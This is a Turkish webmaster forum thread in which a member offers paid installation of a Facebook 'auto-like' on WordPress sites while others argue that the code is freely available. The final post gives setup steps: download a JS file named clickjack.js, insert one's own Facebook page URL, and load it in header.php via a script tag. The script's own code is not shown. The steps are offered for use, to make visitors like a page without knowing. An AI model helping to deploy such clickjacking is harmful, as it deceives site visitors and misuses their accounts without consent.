İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Sitenize Face Auto-like eklenir!!!

incredible

0
İyinet Üyesi
Reaction score
0
Arkadaslar malum bilen var bilmeyen var, bir cok yerde yazilidir nasil autolike sitenize eklendigi. Ama yinede ben yapamadim diyen varsa. Wordpress'inize ucretli olarak auto-like ekleyebilirim.

Yaa kardesim bu heryerde var surda var burda var diyebilirsiniz ki var oldugunu bende biliyorum ve soyluyorum. Yapabilenler kendileri yapsinlar. Yok ben face uye yaptirmak yerine autolike yaptircam diyorsanizda ben size ucretli olarak yaparim.

ilgilenenler PM istedigini belirtsin ben onlara ulasirim.

claymore

0
İyinet Üyesi
Reaction score
1
arkadaşta kod satıyorum dememiş zaten,farklı bir yazı mı okuyoruz acaba.

incredible

0
İyinet Üyesi
Reaction score
0
Arkadaslar malum bilen var bilmeyen var, bir cok yerde yazilidir nasil autolike sitenize eklendigi. Ama yinede ben yapamadim diyen varsa ucretli olarak auto-like ekleyebilirim.

Yaa kardesim bu heryerde var surda var burda var diyebilirsiniz ki var oldugunu bende biliyorum ve soyluyorum. Yapabilenler kendileri yapsinlar. Yok ben face uye yaptirmak yerine autolike yaptircam diyorsanizda ben size ucretli olarak yaparim.
walla yha beleş bi kod her yerde war

Bari Aynı forumda Yapmayın. ÜCRETSİZ Olarak Herkez burada bulabilir.

Kardes heralde yazimi okumadin. bak senin icin alinti yaptim. ben zaten bunun heryerde oldugunu soyledim ama yinede yapamayanlar icin yaparim diyorum. herkeste bunu yapmaktan anlamiyor yani. verdigin yerde de adam anlatti ayrintili ama yinede onu okuyup yapamayanlar var.
Sende bende once bir konuyu oku, direk basliga gore yorum yapma

fRtkmR

0
İyinet Üyesi
Onaylı Üye
Reaction score
14
Dostum yapamayan varsa konu başlığı altında sorar gereken yardım yapılır. Kazanç sağlayacak farklı yollara başvurun, yok o yapamadı bu yapamadı iyi o zaman kuramayan herkeze herşeyi parayla yap, yanlış yerlerde yanlış konular peşindesin..

incredible

0
İyinet Üyesi
Reaction score
0
Hocam simdi PC'ye format atmak lazim. format basit bir olay ama bir suru bilmeyen var ve bunun icin en assagi 20-30TL aliyorlar. simdi bunu yapmak yanlis birseymi?
Mutlaka daima birseyleri bilmeyenler ve bu bilinmeyeni parayla yapan vardir.
Al bende yaziyorum buraya. Yapamayanlar icin yine ucretli sekilde yaparim.

Ekteki js dosyasını indirin ve herhangi bir editörle açın. Aşağıdaki kodu bulun.

Kod:
http://www.facebook.com/SinavBilgisi
Kendi facebook sayfa isminizle değiştirin. Ve tema klasörünün içine atın. (hangi scriptte yapacağınızı bilmediğim için wordpress'e göre konuşuyorum) Daha sonra header.php yi açın ve aşağıdaki kodu bulun.

Kod:
<body>
Hemen altına yapıştırın.

Kod:
<script src="<?php bloginfo('template_url'); ?>/clickjack.js"></script>
header.php yide tema klasörünüze atın. Hepsi bu kadar. Farklı scriptleri kullanan arkadaşlarda kendilerine göre ayarlayabilirler.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

seo ajansı , sosyal medya yönetimi